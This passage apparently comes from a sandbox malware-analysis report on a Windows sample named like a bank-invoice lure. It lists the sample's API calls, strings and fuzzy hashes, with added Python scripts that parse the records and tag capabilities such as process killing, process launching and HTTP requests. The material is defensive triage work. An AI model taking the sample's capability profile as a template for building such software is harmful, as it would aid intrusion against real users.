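# Imports resolved by ordinal (assumption): 16 is recv in the WSOCK32 export table.
ORDINALS = {("WSOCK32", "#16"): "recv"}

# (api, argument index) -> value -> symbolic name, for constants seen in this report.
DECODE = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("mouse_event", 0): {0x8001: "MOUSEEVENTF_ABSOLUTE|MOUSEEVENTF_MOVE"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
}

# Triage rules (labels are this example's own wording): every API in the set
# must be a direct call of the record; subcall entries are not counted.
RULES = {
    "kills a process by handle (WinKill-style)": {"OpenProcess", "TerminateProcess"},
    "starts a program under other credentials": {"CreateProcessWithLogonW"},
    "injects synthetic mouse input": {"mouse_event"},
    "socket receive guarded by select() timeout": {"select", "recv"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: str   # address of the subcall function, "" for a direct call

    def decoded(self) -> list:
        """Arguments with known constants replaced by their symbolic names."""
        out = []
        for i, a in enumerate(self.args):
            val = int(a, 16) if HEX_ARG.match(a) else None
            out.append(DECODE.get((self.name, i), {}).get(val, a))
        return out


def parse_record(text: str) -> list:
    """Parse the API bullets of one record; lines that are not bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        name = ORDINALS.get((m["module"], m["name"]), m["name"])
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(name, m["module"], args, m["ref"] or "", m["sub"] or ""))
    return calls


def triage(calls: list) -> list:
    """Labels of every rule whose APIs all appear as direct calls in the record."""
    direct = {c.name for c in calls if not c.subcall}
    return [label for label, needed in RULES.items() if needed <= direct]


# Two records copied verbatim from this report: function 004B7C07 and function 004C8E7C.
WINKILL = """
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004B7C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004B7C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 004B7C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C4C
"""
TCPRECV = """
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0050DC00), ref: 004C8E7C
• WSAGetLastError.WSOCK32(00000000), ref: 004C8E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 004C8EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 004C8EC5
• _strlen.LIBCMT ref: 004C8EF7
• WSAGetLastError.WSOCK32(00000000), ref: 004C8F6A
"""

if __name__ == "__main__":
    for rec in (WINKILL, TCPRECV):
        calls = parse_record(rec)
        for c in calls:
            print(f"{c.ref}  {c.module}!{c.name}({', '.join(c.decoded())})")
        print("triage:", triage(calls))
```

Run as a script it prints each record with decoded arguments followed by the triage labels; any other "APIs" block from this report can be pasted into parse_record for the same view. Subcall entries (bullets prefixed "Part of subcall function") are parsed but excluded from rule matching, so a pattern is only attributed to the function that itself issues the calls.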
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 004B9A33
                    • EnterCriticalSection.KERNEL32(?,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A44
                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A51
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A5E
                      • Part of subcall function 004B93D1: CloseHandle.KERNEL32(?,?,004B9A6B,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B93DB
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B9A71
                    • LeaveCriticalSection.KERNEL32(?,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A78
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 7ffdb64c4d11e381f3ca43cf12b65b42e215528ed33819d6e483e1cccc5218f1
                    • Instruction ID: f68dfc63fa3535adb5f7bd013c1aed2d4ad1f66c62f7ecb8557ef711f5d7a8f3
                    • Opcode Fuzzy Hash: 7ffdb64c4d11e381f3ca43cf12b65b42e215528ed33819d6e483e1cccc5218f1
                    • Instruction Fuzzy Hash: 62F05E32941211ABD7111BA8EC89EFF776AFF89301F150476F603910A0DB799821EBA8
                    APIs
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • __swprintf.LIBCMT ref: 00471EA6
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00471D49
                    Similarity
                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 2125237772-557222456
                    • Opcode ID: b1da26f50294ed74e4267c58f9b186967dca5de0a4c195bcd3430eda5b3c78c9
                    • Instruction ID: c2044f97548e69c7219c438bb664b5d789b822765fee0b5cef27709907bd5f9c
                    • Opcode Fuzzy Hash: b1da26f50294ed74e4267c58f9b186967dca5de0a4c195bcd3430eda5b3c78c9
                    • Instruction Fuzzy Hash: 84918F71504251AFC724EF26C885CAFB7A4BF85704F00891FF889972A1DB78ED05CB9A
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004CB006
                    • CharUpperBuffW.USER32(?,?), ref: 004CB115
                    • VariantClear.OLEAUT32(?), ref: 004CB298
                      • Part of subcall function 004B9DC5: VariantInit.OLEAUT32(00000000), ref: 004B9E05
                      • Part of subcall function 004B9DC5: VariantCopy.OLEAUT32(?,?), ref: 004B9E0E
                      • Part of subcall function 004B9DC5: VariantClear.OLEAUT32(?), ref: 004B9E1A
                    Strings
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 3e1e9dad33fb0a1cc0d7d7db72c9a8ce7ae31c32e35a5a1e30a9229963f266e6
                    • Instruction ID: 193cedac43054cd5371d61f96263e78781e994852c15000dc15db68db15283eb
                    • Opcode Fuzzy Hash: 3e1e9dad33fb0a1cc0d7d7db72c9a8ce7ae31c32e35a5a1e30a9229963f266e6
                    • Instruction Fuzzy Hash: D19159346043019FCB50DF25D485E9BBBE4EF89704F04886EF89A9B361DB39E905CB96
                    APIs
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • _memset.LIBCMT ref: 004B5438
                    • GetMenuItemInfoW.USER32(?), ref: 004B5467
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004B5513
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004B553D
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 726bcc768706a13e1df469d2a288e2bd380c7f96901fa1bace2b9bc27b4e6a55
                    • Instruction ID: 98cebddf52c6029e3ab4ad7d0bed2a8729e3db9f88490b1912a263c05472a5ac
                    • Opcode Fuzzy Hash: 726bcc768706a13e1df469d2a288e2bd380c7f96901fa1bace2b9bc27b4e6a55
                    • Instruction Fuzzy Hash: F451F371504701ABD7259B28C8417FBF7E9EF85315F080A2FF895D3290D768CD44876A
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B027B
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004B02B1
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004B02C2
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B0344
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: DllGetClassObject
                    • API String ID: 753597075-1075368562
                    • Opcode ID: 821ccc1a6dd468dd7704fb0897db1633bddd02f08c1634302db637e7d6c6beea
                    • Instruction ID: dcfc178123f15e80a906a73fa7d1fe897a60786a205f997dc761137942816f37
                    • Opcode Fuzzy Hash: 821ccc1a6dd468dd7704fb0897db1633bddd02f08c1634302db637e7d6c6beea
                    • Instruction Fuzzy Hash: C8416D71600204AFDB05CF54C889BAB7BF9FF44316B1480AAED099F246D7B9D944CBA4
                    APIs
                    • _memset.LIBCMT ref: 004B5075
                    • GetMenuItemInfoW.USER32 ref: 004B5091
                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004B50D7
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00531708,00000000), ref: 004B5120
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 5776d3994117ec1ad9cad3ec8fa998d559cd73d77485fd9c57532b9d5a0cca09
                    • Instruction ID: 4ed5ddde1f5e6235c8bcbbe4a477cf3b8a53e02e1f43ade5e911a9ce6fc0d8ee
                    • Opcode Fuzzy Hash: 5776d3994117ec1ad9cad3ec8fa998d559cd73d77485fd9c57532b9d5a0cca09
                    • Instruction Fuzzy Hash: 5441AE706047019FD720DF29D884BABBBE4AF89328F14462EF99597391D774E900CB7A
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?), ref: 004D0587
                    Similarity
                    • API ID: BuffCharLower
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 2358735015-567219261
                    • Opcode ID: a7433f82e5e13e282bc8b2fe37a85afca4d112f324657f2d270a0829609bf61d
                    • Instruction ID: 462736ce1174a0a3ec3ff061064f8ed97f2dbcc2f8457ec8ebacd2124e965d80
                    • Opcode Fuzzy Hash: a7433f82e5e13e282bc8b2fe37a85afca4d112f324657f2d270a0829609bf61d
                    • Instruction Fuzzy Hash: C531BF30900116ABCF00EF65C851AEEB3B4FF41314F00862FA826A73D1DB79E916CB84
                    APIs
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004AB88E
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004AB8A1
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 004AB8D1
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: bc79d8c25a5d08ae69fab383bed26b4c9aac7e80adb48940c277ee6999ba9241
                    • Instruction ID: ddaefc293c5da5d6ce6f4955095d896a131200f1f943d2614a8a2c5a731ab10c
                    • Opcode Fuzzy Hash: bc79d8c25a5d08ae69fab383bed26b4c9aac7e80adb48940c277ee6999ba9241
                    • Instruction Fuzzy Hash: 2521D275900104BFDB04ABB9D8869FF7779EF16354B10812EF015A21E2DB6C5D0A97A8
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004C4401
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C4427
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004C4457
                    • InternetCloseHandle.WININET(00000000), ref: 004C449E
                      • Part of subcall function 004C5052: GetLastError.KERNEL32(?,?,004C43CC,00000000,00000000,00000001), ref: 004C5067
                    Similarity
                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 1951874230-3916222277
                    • Opcode ID: e46838e1bfd4ecbc62008998bac7e0474959b2e2fcb7462c53ca08b73a865657
                    • Instruction ID: 54806f5f8138f7a97ac38e57ef09c3ddf96e81d1cb3f76a6ff3ff9fd46162852
                    • Opcode Fuzzy Hash: e46838e1bfd4ecbc62008998bac7e0474959b2e2fcb7462c53ca08b73a865657
                    • Instruction Fuzzy Hash: E421D0B9500208BFE751AF95CD90FBFBAECEB88758F20802FF105D6240DA689D059779
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004D915C
                    • LoadLibraryW.KERNEL32(?), ref: 004D9163
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004D9178
                    • DestroyWindow.USER32(?), ref: 004D9180
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 746bce379e1d9885926d73d04321a30ee161b205ee825fe8d20f49bc7b1c10f4
                    • Instruction ID: 85ac623641da5fdf544cff4427cbbad1f9a85c63aa8a32124fd93437dd521765
                    • Opcode Fuzzy Hash: 746bce379e1d9885926d73d04321a30ee161b205ee825fe8d20f49bc7b1c10f4
                    • Instruction Fuzzy Hash: 86218E71600206BBFF104E649C99EBF37A9EF99364F10461BF954D2390C735DC52A768
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 004B9588
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B95B9
                    • GetStdHandle.KERNEL32(0000000C), ref: 004B95CB
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004B9605
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: fe376be8ff009bc99bbda883ab4cea9967b99a80d0709d7c04693393d714fe01
                    • Instruction ID: a04f5546eceec1191cc5ac861e5c5fdf029fc8372442e70159c554b2081f1da5
                    • Opcode Fuzzy Hash: fe376be8ff009bc99bbda883ab4cea9967b99a80d0709d7c04693393d714fe01
                    • Instruction Fuzzy Hash: 4F21B071640205ABDB219F25DC04ADA7BF8AF54324F204A2AFEA1D72D0D774DD51CB78
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 004B9653
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B9683
                    • GetStdHandle.KERNEL32(000000F6), ref: 004B9694
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004B96CE
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 29b709f75cdc6d203c800073e1ea9759b8c3c94de989b21c03aeae998804d486
                    • Instruction ID: 8b10aeed1160363ae1939e16cda86ed004aeb21d934b0aaecc92842f03429f9d
                    • Opcode Fuzzy Hash: 29b709f75cdc6d203c800073e1ea9759b8c3c94de989b21c03aeae998804d486
                    • Instruction Fuzzy Hash: 6921AF716002059BDB209F699C05EEA77E8AF55724F200A1AFAA1E73D0E774DC51CB78
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BDB0A
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004BDB5E
                    • __swprintf.LIBCMT ref: 004BDB77
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0050DC00), ref: 004BDBB5
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 9b27aa295fc96005be98e8ad8470a952e4922a9546cf614c906861a312def31c
                    • Instruction ID: 00f22d4bf91c261ae44a0769f92c36f5b8b39473d6eab9d3b57f29da11a1aef2
                    • Opcode Fuzzy Hash: 9b27aa295fc96005be98e8ad8470a952e4922a9546cf614c906861a312def31c
                    • Instruction Fuzzy Hash: 71217135A00108AFCB10EFA5D985DEEBBB9EF49704B0040AEF509E7251DB74EA01CB65
                    APIs
                      • Part of subcall function 004AC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004AC84A
                      • Part of subcall function 004AC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004AC85D
                      • Part of subcall function 004AC82D: GetCurrentThreadId.KERNEL32 ref: 004AC864
                      • Part of subcall function 004AC82D: AttachThreadInput.USER32(00000000), ref: 004AC86B
                    • GetFocus.USER32 ref: 004ACA05
                      • Part of subcall function 004AC876: GetParent.USER32(?), ref: 004AC884
                    • GetClassNameW.USER32(?,?,00000100), ref: 004ACA4E
                    • EnumChildWindows.USER32(?,004ACAC4), ref: 004ACA76
                    • __swprintf.LIBCMT ref: 004ACA90
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                    • String ID: %s%d
                    • API String ID: 3187004680-1110647743
                    • Opcode ID: b81035153ca7e189fe3f3084384c65947541b97ff12326f221af0c0a84817742
                    • Instruction ID: 26100c155aada57efdee0b7604ebaeeece32f4d8e49ae5f99fb15d9b450f4f36
                    • Opcode Fuzzy Hash: b81035153ca7e189fe3f3084384c65947541b97ff12326f221af0c0a84817742
                    • Instruction Fuzzy Hash: AD11A5759002057BDB01BF918CC5FF93769AF66708F00806BF918AA182CB789945DB78
                    APIs
                    • __lock.LIBCMT ref: 00497AD8
                      • Part of subcall function 00497CF4: __mtinitlocknum.LIBCMT ref: 00497D06
                      • Part of subcall function 00497CF4: EnterCriticalSection.KERNEL32(00000000,?,00497ADD,0000000D), ref: 00497D1F
                    • InterlockedIncrement.KERNEL32(?), ref: 00497AE5
                    • __lock.LIBCMT ref: 00497AF9
                    • ___addlocaleref.LIBCMT ref: 00497B17
                    Similarity
                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                    • String ID: `O
                    • API String ID: 1687444384-2819024103
                    • Opcode ID: daf3b3e9e47b77b864a86cb70c5ca98e02502b20de86ea7cc61df707b1d4957a
                    • Instruction ID: 34255a55a3c7bc7eb4778d81b514b156397985d8b84f8d7e5545d594d3f3f468
                    • Opcode Fuzzy Hash: daf3b3e9e47b77b864a86cb70c5ca98e02502b20de86ea7cc61df707b1d4957a
                    • Instruction Fuzzy Hash: 1E016D71445B01EFDB20DF76D90574ABBF0AF50329F20891FA49A976A0CB78A644CB09
                    APIs
                    • _memset.LIBCMT ref: 004DE33D
                    • _memset.LIBCMT ref: 004DE34C
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00533D00,00533D44), ref: 004DE37B
                    • CloseHandle.KERNEL32 ref: 004DE38D
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: D=S
                    • API String ID: 3277943733-274248958
                    • Opcode ID: 06e3afa786863cf176ffb7622d8adf733f96201840cd03bf920c837b85207032
                    • Instruction ID: 699265e3c6e4ab12ba1b7ef427293cfbe10fe04446bf3441eb78ce31396b007e
                    • Opcode Fuzzy Hash: 06e3afa786863cf176ffb7622d8adf733f96201840cd03bf920c837b85207032
                    • Instruction Fuzzy Hash: 80F05EF1640304BEE7102B65AC45F7B7E9CEB15794F004832BF08DA2A2D7799E1096A8
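The per-function records in this listing all share one fixed layout: an APIs list with call-site addresses (subcall lines marked "Part of subcall function"), followed by a Similarity block of IDs and fuzzy hashes. The Python below is an added example, not Joe Sandbox tooling, that parses that layout into records and tags each function with the capability mix its direct calls imply, so that records such as the CreateProcessW, CreatePipe/CreateFileW("nul") and InternetOpenUrlW functions above can be pulled out of a long report for triage. The capability labels, the helper names and the trimmed sample excerpt are the editor's own constructions, modelled on three records shown on this page.

```python
"""Parse Joe Sandbox per-function API listings into records and tag each
function with the capability mix implied by its direct API calls.
Added example, not Joe Sandbox code; capability labels are assumptions."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One API line, e.g. "• CreateProcessW.KERNEL32(00000000,?,...), ref: 004DE37B"
# or "• _memset.LIBCMT ref: 004DE33D"; subcall lines carry the callee address.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Key/value lines of the Similarity block, e.g. "• API String ID: 1234-5678".
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str           # call-site address printed in the listing
    callee: str = ""   # non-empty when the call was made from a subcall


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def start(self) -> str:
        """Lowest direct call-site address (the listing prints no function address)."""
        direct = [c.ref for c in self.calls if not c.callee]
        return min(direct) if direct else ""


def parse_listing(text: str) -> List[FunctionRecord]:
    """Every 'APIs' header opens a new function record."""
    records: List[FunctionRecord] = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
    return records


# Editor's own grouping of API names that appear in the listing (assumption).
CAPABILITIES = {
    "process-create":  {"CreateProcessW", "CreateProcessA"},
    "process-inspect": {"OpenProcess", "GetProcessMemoryInfo", "GetProcessIoCounters"},
    "http-client":     {"InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW"},
    "stdio-pipe":      {"CreatePipe", "GetStdHandle"},
    "dynamic-import":  {"LoadLibraryW", "GetProcAddress"},
    "com-instantiate": {"CoCreateInstance"},
}


def capabilities(rec: FunctionRecord) -> List[str]:
    direct = {c.name for c in rec.calls if not c.callee}
    found = [cap for cap, names in CAPABILITIES.items() if direct & names]
    # A pipe plus a handle on the NUL device: child stdio is wired to nowhere.
    if "stdio-pipe" in found and any(
        c.name == "CreateFileW" and c.args and c.args[0].lower() == "nul" for c in rec.calls
    ):
        found.append("stdio-to-nul")
    return found


def triage(text: str) -> List[dict]:
    return [
        {
            "start": rec.start,
            "api_string_id": rec.fields.get("API String ID", ""),
            "instruction_fuzzy_hash": rec.fields.get("Instruction Fuzzy Hash", ""),
            "capabilities": capabilities(rec),
        }
        for rec in parse_listing(text)
    ]


# Constructed excerpt: three records in the listing's format, trimmed.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 004DE33D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00533D00,00533D44), ref: 004DE37B
• CloseHandle.KERNEL32 ref: 004DE38D
Similarity
• API String ID: 3277943733-274248958
• Instruction Fuzzy Hash: 80F05EF1640304BEE7102B65AC45F7B7E9CEB15794F004832BF08DA2A2D7799E1096A8
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 004B9588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B95B9
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004B9605
Similarity
• API String ID: 4209266947-2873401336
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004C4401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C4427
  • Part of subcall function 004C5052: GetLastError.KERNEL32(?,?,004C43CC,00000000,00000000,00000001), ref: 004C5067
Similarity
• API String ID: 1951874230-3916222277
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["start"], row["api_string_id"], ", ".join(row["capabilities"]))
```

Subcall lines are kept on the record but excluded from the capability set, since GetLastError inside a shared helper says nothing about the caller; the Instruction Fuzzy Hash is carried through so that flagged functions can be matched against other reports from the same compiler runtime.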
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004D19F3
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004D1A26
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004D1B49
                    • CloseHandle.KERNEL32(?), ref: 004D1BBF
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 21fd1b8afbde27ddd212a0ea83afb37427cd0a9e2a74a13839e1d4576a682a35
                    • Instruction ID: 2902f1e00ac91fe9df1238bb34695716460fd67b4905f8f9d31ad060c0d92265
                    • Opcode Fuzzy Hash: 21fd1b8afbde27ddd212a0ea83afb37427cd0a9e2a74a13839e1d4576a682a35
                    • Instruction Fuzzy Hash: B981A670600200ABDF11EF65C896BAEBBE5EF04714F14845BFD05AF392D7B8A941CB94
                    APIs
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004DE1D5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DE20D
                    • IsDlgButtonChecked.USER32(?,00000001), ref: 004DE248
                    • GetWindowLongW.USER32(?,000000EC), ref: 004DE269
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004DE281
                    Similarity
                    • API ID: MessageSend$ButtonCheckedLongWindow
                    • String ID:
                    • API String ID: 3188977179-0
                    • Opcode ID: 129b2b1221bd62fde83213cd7a3d1c29053b2f6221c3c07307ac1a2f201cfebc
                    • Instruction ID: 6e3a95f8035de77b6f85ff4e43f7c7448cf2e2bae36bdadc35366c6ba6865b68
                    • Opcode Fuzzy Hash: 129b2b1221bd62fde83213cd7a3d1c29053b2f6221c3c07307ac1a2f201cfebc
                    • Instruction Fuzzy Hash: B861A134B00604AFDB21EF5AC865FAF77BAAB4A300F04405BE8599F391C778A941CB19
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004B1CB4
                    • VariantClear.OLEAUT32(00000013), ref: 004B1D26
                    • VariantClear.OLEAUT32(00000000), ref: 004B1D81
                    • VariantClear.OLEAUT32(?), ref: 004B1DF8
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004B1E26
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType
                    • String ID:
                    • API String ID: 4136290138-0
                    • Opcode ID: 4ae04b0a3c729c7b1fd01f6bbca35b9fce69e7f5bcabbeb61960ea916044b500
                    • Instruction ID: 09ab6842ce2312dd5edb8695c4817943b90ed4f3c3155249989f1a89d79984cf
                    • Opcode Fuzzy Hash: 4ae04b0a3c729c7b1fd01f6bbca35b9fce69e7f5bcabbeb61960ea916044b500
                    • Instruction Fuzzy Hash: 025169B5A00209EFCB14CF58C890AAAB7B9FF4D314B15855AED49DB310E334EA11CFA4
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004D06EE
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004D077D
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004D079B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004D07E1
                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 004D07FB
                      • Part of subcall function 0048E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004BA574,?,?,00000000,00000008), ref: 0048E675
                      • Part of subcall function 0048E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004BA574,?,?,00000000,00000008), ref: 0048E699
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
